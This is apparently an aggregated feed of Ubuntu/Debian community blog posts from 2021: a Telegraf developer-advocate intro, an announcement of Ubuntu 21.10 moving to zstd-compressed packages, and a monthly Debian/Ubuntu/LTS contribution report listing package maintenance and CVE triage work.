Preamble I recently started working for InfluxData as a Developer Advocate on Telegraf, an open source server agent to collect metrics. Telegraf builds from source to ship as a single Go binary. The latest - 1.19.1 was released just yesterday. Part of my job involves helping users by reproducing reported issues, and assisting developers by testing their pull requests. It’s fun stuff, I love it. Telegraf has an extensive set of plugins which supports gathering, aggregating & processing metrics, and sending the results to other systems.
on July 08, 2021 11:00 AM

July 05, 2021

When Julian Andres Klode and I added initial Zstandard compression support to Ubuntu’s APT and dpkg in Ubuntu 18.04 LTS we planned getting the changes accepted to Debian quickly and making Ubuntu 18.10 the first release where the new compression could speed up package installations and upgrades. Well, it took slightly longer than that.

Since then many other packages have been updated to support zstd compressed packages and read-only compression has been back-ported to the 16.04 Xenial LTS release, too, on Ubuntu’s side. In Debian, zstd support is available now in APT, debootstrap and reprepro (thanks Dimitri!). It is still under review for inclusion in Debian’s dpkg (BTS bug 892664).

Given that there is sufficient archive-wide support for zstd, Ubuntu is switching to zstd compressed packages in Ubuntu 21.10, the current development release. Please welcome hello/2.10-2ubuntu3, the first zstd-compressed Ubuntu package that will be followed by many other built with dpkg (>= 1.20.9ubuntu2), and enjoy the speed!

on July 05, 2021 06:26 PM

June 30, 2021

Here’s my (twenty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 30th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

However, this wasn’t really a good month for mental health. And so apparently lesser work but still more than nothing, heh. :D

As a side note, this month, I spent a lot of time on Clubhouse, the new social audio app, at least in India. (I am sure you’d have heard?) Anyway, I made some friends there; more on that later, maybe? (ik, I say that a lot, but ugh, I’ll get to it!)

Anyway, I did the following stuff in Debian:

Uploads and bug fixes:

Other $things:

  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 5th month of actively contributing to Ubuntu. Now that I’ve joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

This month, again, was dedicated to PHP 8.0, transitioning from PHP 7.4 to 8.0. And finally, I and Bryce were able to complete the transition! \o/

This month, I also became an Ubuntu Core Developer. :D I’ll write about it in sometime; lol, yet another promise. Heh.

That said, the things that I mostly worked on are:

Uploads & Syncs:

+1 Maintenance:

  • Shadowed Christian Ehrhardt on his +1. My report here.
    • Added hints for schleuder; MP #404025.
    • Fixed ruby-httpclient via 2.8.3-3 in Debian.
    • Requested removal of ruby-gitlab-pg-query from Impish (-proposed) - LP: #1931257.
    • Re-triggered python-django-debug-toolbar/1:3.2.1-1 for amd64 and it passed & migrated.
    • Fixed ruby-rails-html-sanitizer via 1.3.0-2 in Debian to make it work with newer API of ruby-loofah.
    • Re-triggered ruby-stackprof with glibc as triggers on amd64; it passed & unblocked glibc.
    • Re-triggered ruby-ferret with glibc as triggers on amd64; it passed & unblocked glibc.
    • Re-triggered ruby-hiredis with glibc as triggers on armhf; it passed & unblocked glibc.
    • Added hints for ruby-excon on s390x; MP #404113.

Seed Operations:

  • [2021-06-01] MP #403562/prips for Impish - MP: #403562.
    • [2021-06-02] MP #403602/prips for Hirsute - MP: #403602.
    • [2021-06-02] MP #403603/prips for Groovy - MP: #403603.
    • [2021-06-02] MP #403604/prips for Focal - MP: #403604.
    • [2021-06-02] MP #403605/prips for Bionic - MP: #403605.
  • [2021-06-17] MP #404326/python-aws-requests-auth for Impish - MP #404326.
    • [2021-06-22] MP #404489/python-aws-requests-auth for Hirsute - MP #404489.
    • [2021-06-22] MP #404490/python-aws-requests-auth for Groovy - MP #404490.
    • [2021-06-22] MP #404491/python-aws-requests-auth for Focal - MP #404491.
    • [2021-06-22] MP #404492/python-aws-requests-auth for Bionic - MP #404492.

Bug Triages:

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my twenty-first month as a Debian LTS and eleventh month as a Debian ELTS paid contributor.
I was assigned 40.00 hours for LTS and 40.00 hours for ELTS and worked on the following things:

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Front-desk duty from 28-06 until 04-07 for both LTS and ELTS.
  • Triaged rails, nginx, eterm, mrxvt, rxvt, ieee-data, cloud-init, intel-microcode, htmldoc, djvulibre, composter, and curl.
  • Mark CVE-2021-30535/icu as not-affected for stretch.
  • Mark CVE-2017-7483 as fixed via +deb9u2 upload.
  • Auto EOL’ed unrar-nonfree, darktable, mruby, htslib, ndpi, dcraw, libspring-security-2.0-java, rabbitmq-server, and linux for jessie.
  • [LTS] Discussed ieee-data’s fix for LTS. Thread here.
  • [ELTS] Discussed cloud-init’s logs w/ Raphael and ask for a rebuild.
  • [(E)LTS] Discussed intel-microcode’s status w/ the maintainer and track regressions, et al.
  • [(E)LTS] Discussed htmldoc’s situation; about upgrade problems and prep a fix for that.
  • Attended monthly Debian LTS meeting.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.

Until next time.
:wq for today.

on June 30, 2021 08:40 PM